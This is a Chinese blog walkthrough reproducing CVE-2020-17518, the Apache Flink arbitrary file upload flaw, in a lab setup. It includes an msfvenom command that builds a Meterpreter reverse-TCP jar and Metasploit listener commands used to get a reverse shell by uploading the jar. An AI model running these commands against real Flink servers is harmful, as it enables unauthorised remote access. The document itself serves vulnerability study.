漏洞复现----13、Apache Flink 文件上传漏洞 (CVE-2020-17518)

已于 2022-05-30 15:29:25 修改
阅读量3.2k 收藏 3
点赞数 1
分类专栏: # 漏洞复现 网络安全技术 文章标签: Apache Flink 文件上传漏洞 CVE-2020-17518
于 2021-11-09 17:46:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/120763359
版权

文章目录

一、Apache Flink简介

Apache Flink 是一个框架和分布式处理引擎,用于在无边界和有边界数据流上进行有状态的计算。Flink 能在所有常见集群环境中运行,并能以内存速度和任意规模进行计算。Apache Flink 是一个分布式系统,它需要计算资源来执行应用程序。Flink 集成了所有常见的集群资源管理器,例如 Hadoop YARN、 Apache Mesos 和 Kubernetes,但同时也可以作为独立集群运行。

二、漏洞简介

在Apache Flink1.5.1中引入了 REST 处理程序,允许通过恶意修改HTTP HEADER将上传的文件写入本地文件系统上的任意位置。
攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置。

影响版本:
Apache:Apache Flink: 1.5.1 ---- 1.11.2

三、漏洞复现

1、访问Add New,上传
在这里插入图片描述
2、任意构造上传路径,上传文件。虽然响应显示400,但是已经上传成功。
在这里插入图片描述
3、进入容器.
在这里插入图片描述
4、执行命令,查看上传的文件。
在这里插入图片描述

四、上传jar包getshell

1、Flink支持上传jar包并且执行,所以这里可以通过上传jar包获取Webshell。
利用msfvenom工具生成.jar格式的木马,LHOST、LPORT为监听机器的IP和端口,此处利用Kali作为监听机。

 msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.198.128 LOBPORT=4444 -f jar > rce.jar

2、在监听机执行

use exploit/multi/handler 
set payload java/shell/reverse_tcp 
set LHOST 192.168.198.128
set LPORT 4444 
run

3、访问主页,点击Add New按钮,上传生成的rec.jar。
在这里插入图片描述

4、成功反弹shell。
在这里插入图片描述

李沉肩
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Apache Fink 文件上传漏洞复现及利用
Tauil的博客
07-28 992
其它不修改,然后点击发送,因为该版本的ApacheFlink中存在有一个目录穿越漏洞,详细内容在。一个数据包,数据包中的文件,右键点击重发,然后可以看到数据包中内容。应该就是文件的名称,其创建文件的路径猜测是其默认文件路径的。boundary是分隔符,不用关注,查看到其。处进行检查或者强制规定的路径,而是使用类似。这样的直接创建文件的命令,我们可以通过修改。,我们可以使用该漏洞查看我们创建的内容。,所以猜测该网页文件地址应该是在。的效果,所以我们修改消息体内容为。查看网络数据包,然后上传任意文件。.....
Apache Flink文件上传漏洞CVE-2020-17518漏洞代码分析
SmileAssassn的博客
01-30 890
Apache Flink文件上传漏洞CVE-2020-17518漏洞代码分析
Apache Flink文件上传漏洞CVE-2020-17518漏洞复现分析
SmileAssassn的博客
01-08 547
Apache Flink文件上传漏洞CVE-2020-17518漏洞复现分析
【春秋云境】文件上传漏洞合集
qq_45755193的博客
04-25 902
使用工具:burpsuite使用工具:brupsuite进入/admin/do目录,弱口令为admin/admin888谷歌翻译一下:在这里新增php文件类型php//该密钥为连接密码32位md5值的前16位,默认连接密码rebeyondif(!for($i=0;登录/admin,弱口令admin/123登录文件管理,编辑任意php文件为木马,冰蝎连接得到flag:不登录,直接选择Admin。
网络安全漏洞分析之远程代码执行
Karka_的博客
06-06 237
Apache Flume 是一个分布式的,可靠的,并且可用于高效地收集,汇总和移动大量日志数据的软件。它具有基于流数据流的简单而灵活的体系结构。它具有可调的可靠性机制以及许多故障转移和恢复机制,并且具有健壮性和容错性。它使用一个简单的可扩展数据模型,该模型允许进行在线分析应用程序。
Flink任意文件读写漏洞复现及排查
dayouzi的博客
08-14 276
Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。此外,Flink的运行时本身也支持迭代算法的执行。Apache Flink的数据流编程模型在有限和无限数据集上提供单次事件(event-at-a-time)处理。在基础层面,Flink程序由流和转换组成。
Apache Flink -任意文件写入漏洞CVE-2020-17518
chaojixiaojingang
01-07 4083
1.漏洞描述 Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置。 2.影响版本 1.5.1-1.11.2 3.环境搭建 1)漏洞环境在docker中搭建,进入vulhub/flink/CVE-2020-17518目录 docker-compose up-d 2)访问http://192.168.210.227:80...
CVECVE-2020-17518 & CVE-2020-17519:Flink 任意文件上传 & 未授权访问
边扯边淡
05-09 2528
起序:漏扫完看报告的时候发现的,复现学习一下。 一、靶场环境 使用的是 github 上的 vulhub 环境。因为 Flink 中的 CVE-2020-17518CVE-2020-17519 在 Flink/1.11.2 版本都存在。 vulhub:https://github.com/vulhub/vulhub 1、漏洞描述:任意文件上传 & 未授权访问 CVE 编号 名称 危害 CVE-2020-17518 任意文件上传 应用系统在文件上传功能处对用户上传.
CVE-2020-17518&17519 Apache Flink 文件上传&Apache Flink jobmanagerlogs 目录穿越漏洞复现
ierciyuan的博客
08-04 848
CVE-2020-17518&17519 Apache Flink 文件上传&Apache Flink jobmanagerlogs 目录穿越漏洞复现
Apache Flink CVE-2020-17518-id:L.pdf
最新发布
04-30
Apache Flink CVE-2020-17518--id:L.pdf
flamelu#Vulnerability-1#CVE-2020-17518 Apache Flink 任意文件写入1
07-25
CVE-2020-17518 Apache Flink 任意文件写入影响范围。
apache-doris-flink-connector-1.14_2.12-1.0.3
05-05
Flink Doris Connector(apache-doris-flink-connector-1.14_2.12-1.0.3-incubating-src.tar.gz) Flink Doris Connector Version:1.0.3 Flink Version:1.14 Scala Version:2.12 Apache Doris是一个现代MPP...
apache-doris-flink-connector-1.11_2.12-1.0.3
05-05
Flink Doris Connector(apache-doris-flink-connector-1.11_2.12-1.0.3-incubating-src.tar.gz) Flink Doris Connector Version:1.0.3 Flink Version:1.11 Scala Version:2.12 Apache Doris是一个现代MPP分析...
Apache Flink RCE 漏洞复现
Yanug
05-07 3125
0x00 简介 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 0x01 漏洞概述 攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。 0x02 影响版本 至目前最新版本Apache Flink 1...
flink异常合集
weixin_43644153的博客
03-11 2277
1_配置文件冲突 用flink写了一个很简单的wordCount,打包扔到集群上运行,报如下错误: The program finished with the following exception: org.apache.flink.client.program.ProgramInvocationException: Job failed. (JobID: 01007136fdd759585e...
Apache Flink Jar包上传漏洞复现(详细)
偷一个月亮
11-22 1262
搭建环境 wget http://mirror.bit.edu.cn/apache/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz tar -zxf flink-1.9.1-bin-scala_2.11.tgz ./start-cluster.sh 记得切换目录,.sh在bin文件夹 出现了一点小插曲: Please specif...
Apache Flink 任意 Jar 包上传致 RCE 漏洞复现
m0_48520508的博客
07-12 361
0x00简介 Apache Flink是近几年大火的数据处理引擎。受到各大厂商的推崇并且已经应用与实际的业务场景中。很多公司在进行选型的时候都会选择Apache Flink作为选型的对象。 Apache Flink能用来做什么? l 实时推荐系统 l 实时报表 l 实时数仓与ETL l 复杂事件处理 l 实时欺诈与实时信用评估 l 大数据安全监测 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的AP
apache-flink
05-21
Apache Flink是一个流式计算平台,它支持分布式、高性能、容错的数据流处理程序。它具有低延迟、高吞吐量、精确一次处理语义、支持批处理和流处理等特点,广泛应用于实时大数据处理、流数据分析、机器学习等领域。Flink提供了丰富的API和库,包括DataStream API和Table API,使得用户可以方便地编写和优化复杂的流处理任务。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值